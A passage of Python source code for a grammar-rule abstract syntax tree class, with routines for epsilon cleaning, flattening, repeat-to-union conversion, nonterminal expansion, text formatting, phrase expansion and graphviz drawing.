AST.\n # @param root: root of the subtree to be removed\n def remove_subtree( self, root ):\n\n self.visit_and_remove_subtree( root )\n if root == self.root:\n self.root = None\n\n\n # @brief recursive subroutine of remove_subtree\n def visit_and_remove_subtree( self, n ):\n\n children = [ e.other_node_of( n ) for e in n.out_neighbors() ]\n for c in children:\n self.visit_and_remove_subtree( c )\n n.remove_from_graph()\n\n\n # @public\n # @brief creates a clone of the subtree from this AST.\n # @param root: root of the subtree\n # @return cloned subtree\n def clone_subtree(self, root):\n\n subtree_nodes = self.visit_and_gather_subtree_nodes( root )\n\n g_clone = AST();\n\n node_id = 1\n id_to_original_node = {}\n id_to_clone_node = {}\n for n_org in subtree_nodes:\n\n n_clone = type(n_org)(\"\",\"\") # subclass of ASTNode()\n n_clone.copy_from(n_org)\n\n n_org.node_id = node_id\n n_clone.node_id = node_id\n\n id_to_clone_node [node_id] = n_clone\n id_to_original_node[node_id] = n_org\n\n n_clone.add_to_graph(g_clone)\n\n if n_org == root:\n g_clone.add_root(n_clone)\n\n node_id += 1\n\n self.visit_and_clone_edges(root, g_clone, id_to_clone_node)\n\n org_nodes = [id_to_original_node[k] for k in id_to_original_node ]\n\n for n in org_nodes:\n delattr( n, 'node_id' )\n\n for n in g_clone.nodes():\n delattr( n, 'node_id' )\n\n\n return g_clone\n\n\n # @brief recursive subroutine of clone_subtree\n def visit_and_gather_subtree_nodes(self, n):\n node_list = [n]\n children = [ e.other_node_of( n ) for e in n.out_neighbors() ]\n\n for c in children:\n node_list += self.visit_and_gather_subtree_nodes(c)\n\n return node_list\n\n\n # @brief recursive subroutine of clone_subtree\n def visit_and_clone_edges(self, n, gclone, id_to_clone_node):\n\n for e in n.out_neighbors():\n src_clone = id_to_clone_node[e.src_node.node_id]\n dst_clone = id_to_clone_node[e.dst_node.node_id]\n\n eclone = ASTEdge() \n eclone.add_to_graph( gclone, src_clone, dst_clone, \"directed\" )\n \n children = [ e.other_node_of( n ) for e in n.out_neighbors() ]\n for c in children:\n self.visit_and_clone_edges(c, gclone, id_to_clone_node)\n\n\n # @brief keeping the node n at its current position, copy\n # the contents of the only child into n, remove the child\n # and pull up grand children under n.\n def pullup_only_child(self, n):\n\n child_nodes = [ e.other_node_of( n ) for e in n.out_neighbors() ]\n c = child_nodes[0]\n\n grand_child_nodes = [ e.other_node_of( c ) for e in c.out_neighbors() ]\n\n\n # Migrate all the contents of c to n\n saved_attrib = n.save_attributes()\n n.copy_from( c )\n n.merge_attributes( saved_attrib )\n\n c.remove_from_graph()\n\n for gc in grand_child_nodes:\n\n e = ASTEdge()\n e.add_to_graph( self, n, gc, \"directed\" )\n\n\n ########################################\n # #\n # clean_epsilon() #\n # #\n ########################################\n\n\n # @public\n # @brief eliminate epsilon node from the tree\n # \n # case n is a sequence\n # - remove child epsilons\n # - if there is no child, remove n\n # - if there is only one child, pull up the child to n.\n # \n # case n is a union \n # - remove child epsilons\n # - if there is no child, remove n\n # - if epsilon is removed\n # - if there is only one child, update n to {0,1}\n # - otherwise, update n to {0,1} create new only child c\n # make c to union, and put the child of n under c.\n # - if epsilon is not removed\n # - if there is only one child, pull up the child to n\n #\n # case n is a finite repeat\n # - remove child epsilon\n # - if there is no child, remove n\n # - if n is {1,1}, pull up c to n.\n # - if n is {x,y} and c is {1,1}, pull up c to n and mekt it to {x,y}\n # - if n is {0,1} and c is {1,x}, pull up c to n and make it to {0,x}\n # - if n is {1,x} and c is {0,1}, pull up c to n and make it to {0,x}\n # - if n is {0,1} and c is + pull up c to n and make it *\n # - if n is {0,1} and c is * pull up c to n.\n #\n # case n is a infinite repeat\n # - remove child epsilon\n # - if there is no child, remove n\n # - if c is {0,1}, pull up c to n and make it to *\n # - if n is *, and c is *, pull up c to n\n # - if n is +, and c is *, pull up c to n\n # - if + is *, and c is +, pull up c to n and make it to *\n # - if + is +, and c is +, pull up c to n\n def clean_epsilon(self):\n if self.root:\n if self.root.ast_node_type == 'epsilon':\n self.root.remove_from_graph()\n self.root = None\n else:\n self.visit_and_clean_epsilon( self.root )\n\n\n def visit_and_clean_epsilon(self, n):\n\n children = [ e.other_node_of( n ) for e in n.out_neighbors() ]\n\n for c in children:\n\n self.visit_and_clean_epsilon( c )\n\n epsilon_removed = False\n for c in children:\n if c.ast_node_type == 'epsilon':\n c.remove_from_graph()\n epsilon_removed = True\n\n updated_edges = [ e for e in n.out_neighbors() ] # Makind a copy\n updated_children = [ e.other_node_of( n ) for e in updated_edges ]\n\n if n.ast_node_type == 'sequence':\n self.clean_epsilon_sequence( n, updated_children )\n\n elif n.ast_node_type == 'union':\n self.clean_epsilon_union( n, updated_children, epsilon_removed )\n\n elif n.ast_node_type == 'finite repeat':\n self.clean_epsilon_finite_repeat( n, updated_children )\n\n elif n.ast_node_type == 'infinite repeat':\n self.clean_epsilon_infinite_repeat( n, updated_children )\n\n\n # @brief subroutine of visit_and_clean_epsilon()\n def clean_epsilon_sequence(self, n, children):\n\n if len(children) == 0:\n if n == self.root:\n self.root = None\n n.remove_from_graph()\n\n elif len(children) == 1:\n self.pullup_only_child(n)\n\n\n # @brief subroutine of visit_and_clean_epsilon()\n def clean_epsilon_union( self, n, children, epsilon_removed ):\n\n if len(children) == 0:\n if n == self.root:\n self.root = None\n n.remove_from_graph()\n\n elif len(children) == 1 and not epsilon_removed:\n self.pullup_only_child(n)\n\n elif len(children) == 1 and epsilon_removed:\n n.ast_node_type = 'finite repeat'\n n.repeat_min = 0\n n.repeat_max = 1\n\n elif epsilon_removed:\n n_edges = n.out_neighbors()\n for e in n_edges:\n e.remove_from_graph()\n\n new_child = type(n)(\"finite repeat\", \"\") # subclass of ASTNode()\n new_child.copy_from(n)\n n.reset()\n n.ast_node_type = 'finite repeat'\n n.repeat_min = 0\n n.repeat_max = 1\n\n e_child = ASTEdge()\n e_child.add_to_graph( self, n, new_child, dir=\"directed\" )\n\n for c in children:\n e = ASTEdge()\n e.add_to_graph( self, new_child, c, dir=\"directed\" )\n\n # Re-clean under n after changing n to finit repeat\n self.visit_and_clean_epsilon( n )\n\n\n # @brief subroutine of visit_and_clean_epsilon()\n def clean_epsilon_finite_repeat( self, n, children ):\n\n if len(children) == 0:\n if n == self.root:\n self.root = None\n\n n.remove_from_graph()\n\n else:\n c = children[0]\n\n if n.repeat_min == 1 and n.repeat_max == 1:\n self.pullup_only_child(n)\n\n\n elif c.ast_node_type == 'finite repeat' and c.repeat_min == 1 and c.repeat_max == 1:\n n_repeat_min = n.repeat_min\n n_repeat_max = n.repeat_max\n self.pullup_only_child(n)\n n.repeat_min = n_repeat_min\n n.repeat_max = n_repeat_max\n\n\n elif c.ast_node_type == 'finite repeat' and c.repeat_min == 0 and c.repeat_max == 1 and n.repeat_min == 0:\n n_repeat_max = n.repeat_max\n self.pullup_only_child(n)\n n.repeat_max = n_repeat_max\n\n elif c.ast_node_type == 'finite repeat' and n.repeat_min == 0 and n.repeat_max == 1 and c.repeat_min == 0:\n self.pullup_only_child(n)\n\n\n elif c.ast_node_type == 'finite repeat' and c.repeat_min == 0 and c.repeat_max == 1 and n.repeat_min == 1:\n n_repeat_max = n.repeat_max\n self.pullup_only_child(n)\n n.repeat_max = n_repeat_max\n n.repeat_min = 0\n\n\n elif c.ast_node_type == 'finite repeat' and n.repeat_min == 0 and n.repeat_max == 1 and c.repeat_min == 1:\n self.pullup_only_child(n)\n n.repeat_min = 0\n\n elif c.ast_node_type == 'infinite repeat' and c.repeat_min == 1 and n.repeat_min == 1:\n self.pullup_only_child(n)\n\n\n elif c.ast_node_type == 'infinite repeat' and c.repeat_min == 0 and n.repeat_min == 1:\n self.pullup_only_child(n)\n n.repeat_min = 0\n\n\n elif c.ast_node_type == 'infinite repeat' and c.repeat_min == 1 and n.repeat_min == 0:\n self.pullup_only_child(n)\n n.repeat_min = 0\n\n\n elif c.ast_node_type == 'infinite repeat' and c.repeat_min == 0 and n.repeat_min == 0:\n self.pullup_only_child(n)\n\n\n\n # @brief subroutine of visit_and_clean_epsilon()\n def clean_epsilon_infinite_repeat( self, n, children ):\n\n if len(children) == 0:\n if n == self.root:\n self.root = None\n n.remove_from_graph()\n\n else:\n c = children[0]\n\n if c.ast_node_type == 'finite repeat' and c.repeat_min == 1 and n.repeat_min == 0:\n self.pullup_only_child(n)\n n.ast_node_type = 'infinite repeat'\n n.repeat_min = 0\n\n\n elif c.ast_node_type == 'finite repeat' and c.repeat_min == 0 and n.repeat_min == 0:\n self.pullup_only_child(n)\n n.ast_node_type = 'infinite repeat'\n\n\n elif c.ast_node_type == 'finite repeat' and c.repeat_min == 1 and n.repeat_min == 1:\n self.pullup_only_child(n)\n n.ast_node_type = 'infinite repeat'\n\n\n elif c.ast_node_type == 'finite repeat' and c.repeat_min == 0 and n.repeat_min == 1:\n self.pullup_only_child(n)\n n.ast_node_type = 'infinite repeat'\n\n\n elif c.ast_node_type == 'infinite repeat':\n new_min = min(n.repeat_min, c.repeat_min)\n self.pullup_only_child(n)\n n.repeat_min = new_min\n\n\n ########################################\n # #\n # flatten_children() #\n # #\n ########################################\n\n\n # @public\n # @brief try flattening the tree by aggregating the chain\n # of the same type of nodes into a single layer.\n # used for union and sequence.\n def flatten_children( self ):\n if self.root:\n self.visit_and_flatten_children( self.root )\n\n\n # @brief recursive subroutine used by flatten_children\n def visit_and_flatten_children( self, n ):\n\n children = [ e.other_node_of( n ) for e in n.out_neighbors() ]\n\n for c in children:\n\n self.visit_and_flatten_children( c )\n\n if n.ast_node_type == 'union' or n.ast_node_type == 'sequence':\n\n same_type_found = False\n\n for c in children:\n \n if c.ast_node_type == n.ast_node_type and c.can_be_flattened():\n same_type_found = True\n\n if same_type_found:\n\n self.replace_child_with_grand_children( n )\n\n\n # @brief replace the children with grandchildren keeping the order\n # recursive subroutine used by flatten_children\n # 1.\n # (n)\n # |\n # +--------+-------+ <= incident_edges (to be removed)\n # c c c \n # /|\\ /|\\ /|\\\n # g1 g2 g3 g4 g5 g6 g7 g8 g9\n #\n #\n # 2.\n # (n)\n #\n # [ c c c ] <= adjacent_nodes_of_c (to be removed)\n # /|\\ /|\\ /|\\ <= incident_edges_of_c (to be removed)\n # g1 g2 g3 g4 g5 g6 g7 g8 g9\n #\n #\n # 3.\n # (n)\n #\n # [g1 g2 g3 g4 g5 g6 g7 g8 g9] <= new_children\n #\n # 4.\n # (n)\n # +--+--+--+-+-+--+--+--+--+\n # | | | | | | | | |\n # g1 g2 g3 g4 g5 g6 g7 g8 g9\n #\n def replace_child_with_grand_children( self, n ):\n\n incident_edges = [ e for e in n.out_neighbors() ]\n adjacnt_nodes = [ e.other_node_of( n ) for e in incident_edges ]\n\n for e in incident_edges: \n e.remove_from_graph()\n\n new_children = []\n\n for c in adjacnt_nodes:\n\n if c.ast_node_type == n.ast_node_type:\n \n incident_edges_of_c = [ e for e in c.out_neighbors() ]\n adjacnt_nodes_of_c = [ e.other_node_of( c ) for e in incident_edges_of_c ]\n\n for e in incident_edges_of_c:\n e.remove_from_graph()\n\n c.remove_from_graph()\n new_children = new_children + adjacnt_nodes_of_c\n\n else:\n new_children.append(c)\n\n for c in new_children:\n new_edge = ASTEdge()\n new_edge.add_to_graph( n.graph, n, c, dir=\"directed\" )\n\n\n ########################################\n # #\n # replace_fixed_repeat_with_union() #\n # #\n ########################################\n\n\n # @public\n # @brief replace fixed repetition node with a union of \n # repeated sequences other than {0,1}.\n # this must be done before generating FST.\n # otherwise, the finite repeat nodes are treated as\n # inifinite repeat in FST\n def replace_finite_repeat_with_union( self ):\n if self.root:\n self.visit_and_replace_fixed_repeat_with_union( self.root )\n self.clean_epsilon()\n self.flatten_children()\n\n # @brief recursive subroutine of replace_fixed_repeat_with_union()\n def visit_and_replace_fixed_repeat_with_union( self, n ):\n\n if n.ast_node_type != 'finite repeat':\n return\n\n if n.repeat_min == 0 and n.repeat_max == 1:\n return\n\n\n if n.repeat_min == 1 and n.repeat_max == 1:\n # removed by clean_epsilon()\n return\n\n\n if n.repeat_min == 0 and n.repeat_max == 0:\n self.remove_subtree(n)\n if n == self.root:\n self.root = None\n return\n\n\n children = [ e.other_node_of( n ) for e in n.out_neighbors() ]\n\n for c in children:\n\n self.visit_and_replace_fixed_repeat_with_union( c )\n\n if n.ast_node_type == 'finite repeat' and n.repeat_max > 1:\n\n original_repeat_min = n.repeat_min\n \n c0 = children[0]\n\n new_sequences = []\n\n for i in range ( max( n.repeat_min, 1 ), n.repeat_max + 1 ):\n seq = self.create_sequence_of_repeated( c0, i )\n new_sequences.append(seq)\n\n for c in children:\n self.remove_subtree(c)\n\n if len(new_sequences) == 0:\n # Make this a dead node.\n n.ast_node_type = 'epsilon'\n n.content = ''\n\n elif len(new_sequences) == 1:\n seq_root = new_sequences[0]\n if original_repeat_min == 0:\n # replace n with {0,1}\n n.repeat_min = 0\n n.repeat_max = 1\n e = ASTEdge()\n e.add_to_graph( self, n, seq_root, dir=\"directed\" )\n\n else: \n # replace n with new_sequences[0]\n new_children = [ e.other_node_of( seq_root ) for e in seq_root.out_neighbors() ]\n\n n.copy_from(seq_root)\n seq_root.remove_from_graph()\n\n for c in new_children:\n e = ASTEdge()\n e.add_to_graph( self, n, c, dir=\"directed\" )\n\n else:\n\n if original_repeat_min == 0:\n # replace n with {0,1}\n n.repeat_min = 0\n n.repeat_max = 1\n\n n_child = type(n)(\"union\", \"\") # subclass of ASTNode()\n e_child = ASTEdge()\n e_child.add_to_graph( self, n, n_child, dir=\"directed\" )\n for c in new_sequences:\n e = ASTEdge()\n e.add_to_graph( self, n_child, c, dir=\"directed\" )\n\n else:\n n.ast_node_type = 'union'\n n.content = ''\n n.repeat_min == 1\n n.repeat_max == 1\n for c in new_sequences:\n e = ASTEdge()\n e.add_to_graph( self, n, c, dir=\"directed\" )\n\n\n # @brief subroutine of visit_and_replace_fixed_repeat_with_union()\n def create_sequence_of_repeated( self, node, num ):\n\n if num == 0:\n n_new = type(node)(\"epsilon\", \"\") # subclass of ASTNode()\n n_new.add_to_graph(self)\n return n_new\n\n if num == 1:\n g = self.clone_subtree(node)\n n_new = g.root\n self.transfer_from( g )\n return n_new\n\n else:\n n_new = type(node)(\"sequence\", \"\") # subclass of ASTNode()\n n_new.add_to_graph(self)\n for i in range (0, num):\n g = self.clone_subtree(node)\n c = g.root\n self.transfer_from( g )\n e_new = ASTEdge()\n e_new.add_to_graph( self, n_new, c, dir=\"directed\" )\n\n return n_new\n\n\n ########################################\n # #\n # expand_nonterminals() #\n # #\n ########################################\n\n\n # @public\n # @brief returns the set of names of nonterminals found in the tree.\n def find_dependent_nonterminals( self ):\n if self.root:\n return self.visit_and_find_dependent_nonterminals( self.root )\n else:\n return set()\n\n\n # @brief recursive subroutine of find_dependent_nonterminals().\n def visit_and_find_dependent_nonterminals( self, n ):\n\n S = set()\n\n children = [ e.other_node_of( n ) for e in n.out_neighbors() ]\n\n for c in children:\n S_returned = self.visit_and_find_dependent_nonterminals( c )\n S = S.union( S_returned )\n\n if n.ast_node_type == 'nonterminal':\n S.add(n.content)\n\n return S\n\n\n # @public\n # @brief expand the nonterminals with the corresponding subtrees.\n # if there is cycle, the behavior is undefined.\n #\n # @param nonterminals_expanded : list of nonterminals expanded\n # @param trees : dictionary {k: nonterminal v: AST}\n\n def expand_nonterminals( self, nonterminals_expanded, trees ):\n\n if self.root:\n\n self.expand_nonterminals_root( nonterminals_expanded, trees )\n self.visit_and_expand_nonterminals( self.root, nonterminals_expanded, trees )\n\n\n # @brief subroutine of expand_nonterminal()\n # special case where the root itself is the nonterminal to be replaced.\n def expand_nonterminals_root( self, nonterminals_expanded, trees ): \n\n if self.root:\n\n r_content = self.root.content\n\n if self.root.ast_node_type == 'nonterminal' and r_content in nonterminals_expanded:\n\n if r_content in trees:\n saved_attrib = self.root.save_attributes()\n self.root.remove_from_graph()\n t = trees[ r_content ].clone()\n self.root = t.root\n self.transfer_from(t)\n t.root.merge_attributes(saved_attrib)\n self.expand_nonterminals(nonterminals_expanded, trees )\n\n\n # @brief recursive subroutine of expand_nonterminal()\n def visit_and_expand_nonterminals( self, n, nonterminals_expanded, trees ):\n\n incident_edges = [ e for e in n.out_neighbors() ]\n adjacent_nodes = [ e.other_node_of( n ) for e in incident_edges ]\n\n for i in range(0,len(incident_edges)):\n\n c = adjacent_nodes[i]\n\n if c.ast_node_type == 'nonterminal':\n\n if c.content in nonterminals_expanded:\n if c.content in trees:\n next_edge = None\n if i < len(incident_edges) - 1:\n next_edge = incident_edges[i+1]\n saved_attrib = c.save_attributes()\n c.remove_from_graph()\n \n t = trees[ c.content ].clone()\n c_new = t.root\n self.transfer_from(t)\n c_new.merge_attributes(saved_attrib)\n e_new = ASTEdge()\n e_new.add_to_graph_at_specific_positions( self, n, c_new, \"directed\", next_edge, None )\n\n # Refresh the incident and adjacent features.\n incident_edges = [ e for e in n.out_neighbors() ]\n adjacent_nodes = [ e.other_node_of( n ) for e in incident_edges ]\n\n for i in range(0,len(incident_edges)):\n c = adjacent_nodes[i]\n self.visit_and_expand_nonterminals( c, nonterminals_expanded, trees )\n\n\n\n ########################################\n # #\n # emit_formatted_text() #\n # #\n ########################################\n\n\n # @public\n # @brief emit formatted rule of this AST\n # the tree must be epsilon-cleaned.\n #\n # @param width_hint: hint for the maximum width at which \n # the text is folded with carriage return\n # 0 for single line formatting.\n # @param indent: indent width for each depth\n # @param print_attr: True/False\n def emit_formatted_text(self, width_hint, indent, print_attr=True):\n self.calculate_text_width(print_attr)\n if self.root:\n return self.visit_and_emit_formatted_text( self.root, 0, width_hint, indent, print_attr )\n\n else:\n return ''\n\n\n # @brief calculate the text width of subtree at each node.\n def calculate_text_width(self, print_attr):\n \n if self.root:\n return self.visit_and_calculate_text_width( self.root, print_attr )\n else:\n return 0\n\n\n # @brief recursive subroutine of calculate_text_width()\n # this is a bottom-up accummulative process.\n # the width is stored to ASTNode.text_width.\n def visit_and_calculate_text_width( self, n, print_attr ):\n\n children = [ e.other_node_of( n ) for e in n.out_neighbors() ]\n\n width = 0\n\n if n.ast_node_type == 'union':\n\n width += len('()')\n width += ( max(0, len(children) - 1) * len(' | ') )\n\n elif n.ast_node_type == 'sequence':\n\n width += ( max(0, len(children) - 1) * len(' ') )\n\n elif n.ast_node_type == 'terminal':\n width += len(n.content)\n\n elif n.ast_node_type == 'nonterminal':\n width += len(n.content)\n\n elif n.ast_node_type == 'finite repeat':\n width += len( '( ){ ' + str(n.repeat_min) + ', ' + str(n.repeat_max) + ' }' )\n\n elif n.ast_node_type == 'infinite repeat':\n width += len( '( )*' )\n\n if print_attr:\n width += len( self.add_prologue_and_epilogue( n, '', True ) )\n\n for c in children:\n width += self.visit_and_calculate_text_width( c, print_attr )\n\n n.text_width = width\n \n return width \n\n\n # @brief subroutine to visit_and_emit_formatted_text()\n def make_indent(self, indent):\n out_str = \"\"\n for i in range ( 0, indent ):\n out_str += \" \"\n return out_str\n\n\n # @brief recursive subroutine of emit_formatted_text()\n def visit_and_emit_formatted_text( self, n, depth, width_hint, indent, print_attr ):\n out_str = ''\n\n need_paren_for_attr = False\n\n if n.ast_node_type == 'terminal':\n out_str += n.content\n\n elif n.ast_node_type == 'nonterminal':\n out_str += n.content\n\n elif n.ast_node_type == 'union':\n rtn_str, need_paren_for_attr = self.visit_and_emit_formatted_text_union( n, depth, width_hint, indent, print_attr )\n out_str += rtn_str\n\n elif n.ast_node_type == 'sequence':\n rtn_str, need_paren_for_attr = self.visit_and_emit_formatted_text_sequence( n, depth, width_hint, indent, print_attr )\n out_str += rtn_str\n\n elif n.ast_node_type == 'finite repeat':\n rtn_str, need_paren_for_attr = self.visit_and_emit_formatted_text_finite_repeat( n, depth, width_hint, indent, print_attr )\n out_str += rtn_str\n\n elif n.ast_node_type == 'infinite repeat':\n rtn_str, need_paren_for_attr = self.visit_and_emit_formatted_text_infinite_repeat( n, depth, width_hint, indent, print_attr )\n out_str += rtn_str\n\n\n if print_attr:\n out_str = self.add_prologue_and_epilogue( n, out_str, need_paren_for_attr )\n return out_str\n\n\n # @brief subroutine of visit_and_emit_formatted_text()\n def add_prologue_and_epilogue( self, n, out_str, need_paren ):\n\n prologue = n.prologue_for_formatted_text()\n epilogue = n.epilogue_for_formatted_text()\n\n if n.ast_node_type == 'terminal' or n.ast_node_type == 'nonterminal':\n if epilogue != '':\n out_str += ' '\n out_str += epilogue\n\n elif n.ast_node_type == 'union' or n.ast_node_type == 'sequence' or n.ast_node_type == 'finite repeat' or n.ast_node_type == 'infinite repeat':\n\n prologue_insert_pos = 0\n new_out_str = ''\n if n.ast_node_type == 'union' and len(out_str)>0 and out_str[0] == '\\n':\n prologue_insert_pos = 1\n while prologue_insert_pos < len(out_str) and out_str[prologue_insert_pos] == ' ':\n prologue_insert_pos += 1\n\n if prologue != '':\n new_out_str += out_str[0:prologue_insert_pos]\n new_out_str += prologue\n new_out_str += ' '\n\n if need_paren and ( epilogue != '' or prologue != '' ):\n new_out_str += '( ' + out_str[prologue_insert_pos:] + ' )'\n else:\n new_out_str += out_str[prologue_insert_pos:]\n\n if epilogue != '':\n new_out_str += ' ' \n new_out_str += epilogue\n\n out_str = new_out_str\n\n return out_str\n\n # @brief recursive subroutine of visit_and_emit_formatted_text()\n def visit_and_emit_formatted_text_union( self, n, depth, width_hint, indent, print_attr ):\n\n children = [ e.other_node_of( n ) for e in n.out_neighbors() ]\n\n out_str = \"\"\n need_paren_for_attr = False\n\n if width_hint != 0 and width_hint < n.text_width and len(children)>1:\n\n out_str += '\\n'\n out_str += self.make_indent( (depth)*indent )\n out_str += '('\n\n first = True\n for c in children:\n if first:\n first = False\n out_str += '\\n'\n out_str += self.make_indent( (depth+1)*indent )\n\n else:\n out_str += ' |\\n'\n out_str += self.make_indent( (depth+1)*indent )\n\n out_str += self.visit_and_emit_formatted_text( c, depth + 1, width_hint, indent, print_attr )\n\n out_str += '\\n'\n out_str += self.make_indent( depth*indent )\n out_str += ')'\n else:\n c0_epilogue = children[0].epilogue_for_formatted_text()\n if len(children)>1 or c0_epilogue != '':\n out_str += '( '\n\n first = True\n for c in children:\n if first:\n first = False\n\n else:\n out_str += ' | '\n\n out_str += self.visit_and_emit_formatted_text(c, depth + 1, width_hint, indent, print_attr )\n\n out_str += ' )'\n\n else: # len(children) == 1 and prologue == '' and epilogue == ''\n out_str += self.visit_and_emit_formatted_text(children[0], depth + 1, width_hint, indent, print_attr )\n need_paren_for_attr = True\n\n return out_str, need_paren_for_attr\n\n\n # @brief recursive subroutine of visit_and_emit_formatted_text()\n def visit_and_emit_formatted_text_sequence( self, n, depth, width_hint, indent, print_attr ):\n\n out_str = ''\n\n children = [ e.other_node_of( n ) for e in n.out_neighbors() ]\n\n first = True\n for c in children:\n\n if first:\n first = False\n else:\n out_str += ' '\n\n out_str += self.visit_and_emit_formatted_text( c, depth, width_hint, indent, print_attr )\n\n need_paren_for_attr = True\n \n return out_str, need_paren_for_attr\n\n\n\n # @brief recursive subroutine of visit_and_emit_formatted_text()\n def visit_and_emit_formatted_text_finite_repeat( self, n, depth, width_hint, indent, print_attr ):\n\n children = [ e.other_node_of( n ) for e in n.out_neighbors() ]\n\n child_prologue = children[0].prologue_for_formatted_text()\n child_epilogue = children[0].epilogue_for_formatted_text()\n\n if ( children[0].ast_node_type == 'terminal' \n or children[0].ast_node_type == 'nonterminal' \n or children[0].ast_node_type == 'union' ) and child_prologue == '' and child_epilogue == '':\n out_str = self.visit_and_emit_formatted_text( children[0] , depth , width_hint, indent, print_attr )\n else:\n out_str = '( '\n out_str += self.visit_and_emit_formatted_text( children[0] , depth , width_hint, indent, print_attr )\n out_str += ' )'\n\n\n if n.repeat_min == 0 and n.repeat_max == 1:\n out_str += '?'\n else:\n out_str += '{ '\n out_str += str(n.repeat_min )\n out_str += ', '\n out_str += str(n.repeat_max)\n out_str += ' }'\n\n need_paren_for_attr = True\n return out_str, need_paren_for_attr\n\n\n # @brief recursive subroutine of visit_and_emit_formatted_text()\n def visit_and_emit_formatted_text_infinite_repeat( self, n, depth, width_hint, indent, print_attr ):\n\n children = [ e.other_node_of( n ) for e in n.out_neighbors() ]\n\n child_prologue = children[0].prologue_for_formatted_text()\n child_epilogue = children[0].epilogue_for_formatted_text()\n\n if ( children[0].ast_node_type == 'terminal' or children[0].ast_node_type == 'nonterminal' or children[0].ast_node_type == 'union' ) and child_prologue == '' and child_epilogue == '':\n out_str = self.visit_and_emit_formatted_text( children[0] , depth , width_hint, indent, print_attr )\n\n else:\n out_str = '( '\n out_str += self.visit_and_emit_formatted_text( children[0] , depth , width_hint, indent, print_attr )\n out_str += ' )'\n\n\n if n.repeat_min == 0:\n out_str += '*'\n else:\n out_str += '+'\n\n need_paren_for_attr = True\n return out_str, need_paren_for_attr\n\n\n ########################################\n # #\n # expand_phrases() #\n # #\n ########################################\n\n\n # @public\n # @brief generate expanded phrases\n def expand_phrases( self, gen_attributes = True ):\n\n self.node_attribute_id_next = 0\n if self.root:\n return self.visit_and_expand_phrases( self.root , gen_attributes )\n else:\n return []\n\n\n def visit_and_expand_phrases( self, n , gen_attributes ):\n\n children = [ e.other_node_of( n ) for e in n.out_neighbors() ]\n \n\n main_list = []\n need_paren_for_attr = False\n\n if n.ast_node_type == 'union':\n phrases = []\n for c in children:\n phrases = phrases + self.visit_and_expand_phrases( c, gen_attributes )\n main_list = phrases\n\n elif n.ast_node_type == 'sequence':\n phrases = []\n for c in children:\n phrases = cross_product( phrases, self.visit_and_expand_phrases( c, gen_attributes ), ' ' )\n main_list = phrases\n need_paren_for_attr = True\n\n elif n.ast_node_type == 'terminal':\n main_list = [ n.content ]\n\n elif n.ast_node_type == 'nonterminal':\n main_list = [ n.content ]\n\n elif n.ast_node_type == 'epsilon':\n main_list = [ '' ]\n\n elif n.ast_node_type == 'finite repeat':\n if n.repeat_min == 0 and n.repeat_max == 1:\n phrases = [ '' ]\n phrases = phrases + self.visit_and_expand_phrases( children[0], gen_attributes )\n main_list = phrases\n else:\n # We don't further expand into repetition.\n phrase, need_paren_for_attr = self.visit_and_emit_formatted_text_finite_repeat( n, 0, 0, 0, gen_attributes )\n main_list = [ phrase ]\n\n elif n.ast_node_type == 'infinite repeat':\n # We don't further expand into repetition.\n phrase, need_paren_for_attr = self.visit_and_emit_formatted_text_infinite_repeat( n, 0, 0, 0, gen_attributes )\n main_list = [ phrase ]\n\n if gen_attributes:\n prologue = ''\n if n.ast_node_type == 'union' or n.ast_node_type == 'sequence' or n.ast_node_type == 'finite repeat' or n.ast_node_type == 'infinite repeat':\n prologue = n.attribute_for_expansion_before( self.node_attribute_id_next )\n\n epilogue = ''\n if n.ast_node_type == 'terminal' or n.ast_node_type == 'nonterminal' or n.ast_node_type == 'union' or n.ast_node_type == 'sequence' or n.ast_node_type == 'finite repeat' or n.ast_node_type == 'infinite repeat':\n epilogue = n.attribute_for_expansion_after( self.node_attribute_id_next )\n if prologue != '' or epilogue != '':\n self.node_attribute_id_next += 1\n\n updated_main_list = []\n if prologue != '':\n if epilogue != '':\n\n for m in main_list:\n if m != '':\n if need_paren_for_attr:\n updated_main_list.append( '( ' + prologue + ' ( ' + m + ' ) ' + epilogue + ' )' )\n else:\n updated_main_list.append( '( ' + prologue + ' ' + m + ' ' + epilogue + ' )' )\n else:\n updated_main_list.append( '( ' + prologue + ' __EPS__ ' + epilogue + ' )' )\n else:\n\n for m in main_list:\n if m != '':\n if need_paren_for_attr:\n updated_main_list.append( '( ' + prologue + ' ( ' + m + ' ) )' )\n else:\n updated_main_list.append( '( ' + prologue + ' ' + m + ' )' )\n else:\n updated_main_list.append( '( ' + prologue + ' __EPS__ )' )\n\n else: \n if epilogue != '':\n for m in main_list:\n if m != '':\n if need_paren_for_attr:\n updated_main_list.append( '( ( ' + m + ' ) ' + epilogue + ' )' )\n else:\n updated_main_list.append( '( ' + m + ' ' + epilogue + ' )' )\n else:\n updated_main_list.append( '( __EPS__ ' + epilogue + ' )' )\n else:\n for m in main_list:\n updated_main_list.append( m )\n\n return updated_main_list\n\n else:\n return main_list\n\n\n ########################################\n # #\n # draw() #\n # #\n ########################################\n\n\n # @public\n # @brief draws AST with graphviz\n # @param tree_name : output file name\n # @param view_now : True/False launch viewer immediately\n # @param out_format : 'svg' or 'pdf'. Use 'svg' if window's PDF renders\n # messes up UTF-8.\n # @param orientagion: 'vertical' or 'horizontal'. top to bottom or left to right.\n # specifies the direction of \n # the tree from the root toward children.\n def draw( self, tree_name, view_now = True, out_format =\"svg\", orientation =\"vertical\" ):\n\n g_dot = Digraph( comment = tree_name )\n if orientation == 'horizontal':\n g_dot.graph_attr['rankdir'] = 'LR'\n node_set = set()\n\n self.node_id = 1\n\n self.visit_and_draw( self.root, g_dot , -1, node_set )\n\n for n in self.nodes():\n if hasattr(n, 'node_id'):\n delattr( n, 'node_id' )\n\n g_dot.render(tree_name.strip('<>'), view=view_now, format=out_format)\n\n\n # @brief recursive subroutine of draw()\n def visit_and_draw( self, n, dot , parent_id, node_set ):\n \n n.node_id = self.node_id\n should_visiting_children = True\n\n self.node_id += 1\n if n.node_id not in node_set:\n\n label_out, should_visit_children = n.generate_string_for_drawing(True)\n dot.node( str(n.node_id), label_out )\n\n node_set.add(n.node_id)\n\n\n if parent_id != -1:\n dot.edge( str(parent_id), str(n.node_id) )\n\n \n if should_visit_children:\n\n children = [ e.other_node_of( n ) for e in n.out_neighbors() ]\n\n for c in children:\n self.visit_and_draw( c , dot, n.node_id, node_set )\n\n # Add horizontal edges to force ordering among children.\n for i in range( 0, len(children)-1 ):\n dot.edge( str(children[i].node_id), str(children[i+1].node_id) ,style='invis' )\n\n with dot.subgraph() as s:\n s.attr(rank = 'same')\n for c in children:\n s.node(str(c.node_id))\n\n\n ########################################\n # #\n # generate_fst() #\n # #\n ########################################\n\n\n # 